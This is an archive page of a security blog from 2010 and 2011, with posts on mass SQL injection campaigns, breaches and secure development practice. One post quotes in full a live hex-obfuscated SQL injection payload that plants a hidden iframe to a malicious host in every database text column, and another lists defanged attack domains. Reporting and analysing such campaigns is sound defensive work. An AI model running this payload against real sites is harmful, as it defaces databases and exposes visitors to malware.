Thursday, March 31, 2011

lizamoon.com + Mass SQL Injection

I've been following another mass SQL Injection attack that inserts a piece of code into the page which results to a redirect to a rogue anti-virus site.

From the image below you can see that the results are near 226, 000 URLs. Google search.


Update 10:42 EST: I've identified a few other domains that are similar to the injection files.The consistency and similarities of the files details that the injection attacks started in 2010.

hxxp://alexblane.com/ur.php
hxxp://sol-stats.info/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
Posted by at 4:10 AM 0 comments

Tuesday, March 29, 2011

MySQL.com + Blind SQLi

MySQL.com was found vulnerable to a blind SQL Injection over the weekend. The outcome revealed username and passwords. You can find a list and attempts at cracking the hash values here.
Posted by at 5:56 AM 0 comments

Thursday, February 17, 2011

SQL Injection continues into 2011

What does Lush, recruitireland.com, eHarmony, 5 oil and gas companies, HBGary and Nasdaq have in common? They were targeting and exploited by a vulnerability that is over 10 years old. Each organization was found vulnerable to an SQLi and compromised.

The thought here is whether or not the organizations developed their own code by concatenating and using a blacklist method that was bypassed by obfuscation techniques. I guess we'll never know, the one thing that we do know is that this one technique is far from over.
Posted by at 5:06 AM 0 comments

Wednesday, February 9, 2011

SafeCode - secure development guide

The paper prescribes new and updated security practices that should be applied during the Design, Programming and Testing activities of the software development lifecycle. These practices have been shown to be effective across diverse development environments.

A guide to the most effective secure development practices in use today.

http://www.safecode.org/publications/SAFECode_Dev_Practices0211.pdf


Posted by at 9:41 AM 1 comments

Wednesday, December 1, 2010

Secure Coding vs Web Automated Scanners

I often get the question if web automated scanners have a place within the SDLC. I have a canned response to that "yes and no"

Many organizations will adopt the "catch all" syndrome, leaving security to the end which becomes expensive and tedious and hoping that the one thing that will save your organization from financial and reputational losses is a web automated scanner. This one attempt at locating risks is not the ideal way and one that will fail. Consider the dynamic aspects of an application and the limitations of an automated scanner has when crawling.

When developing a secure application it must be built into the application from it's inception. Each stage of the SDLC must have security thought out components from the gathering of requirements, application design, development process, testing and deployment. Testing for security at each stage will provide you with absolute assurance that identified risks will be addressed and corrected prior to deployment.

Code review is the ideal way to validate the security posture of your application, but automated scanners do have their place. It is up to the tester who is operating the scanner to properly identify the application components. In conjunction with the risk management of the application and the understanding of the application functions and data handling capabilities it is possible to ensure a secure application.
Posted by at 6:37 AM 0 comments

Wednesday, August 18, 2010

Another Mass SQL Injection Attack

I've been following yet another mass SQLi attack, more so over the last 3 days. The obfuscated query attempts once again to bypass common filters. The query below displays one that has been in circulation

declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320
764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e61
6d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e6964
20614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e7854595
0653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d2
05461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657
845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722
834303030292c5b272b40432b275d29292b636153542830783343363936363732363136443635323037333732363333443232363837343
73437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324
53730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343
34432323330323232303733373437393643363533443232363436393733373036433631373933413645364636453635323233453343324
6363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c65
5f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c6
55f435552736f7220%20as%20varchar(4000));exec(@s);--

The query is using CAST as we saw in many attempts in 2008 and 2009, this is used to convert data types.

The last time I checked over 500, 000 sites had been compromised.
Posted by at 6:38 AM 2 comments

Thursday, June 17, 2010

Hacking Under the Radar

The 26th edition of the INSECURE magazine was recently published. I had the opportunity to submit an article based on some research that I conducted a short time ago. You can find the article here
Posted by at 6:10 AM 0 comments
Subscribe to: Posts (Atom)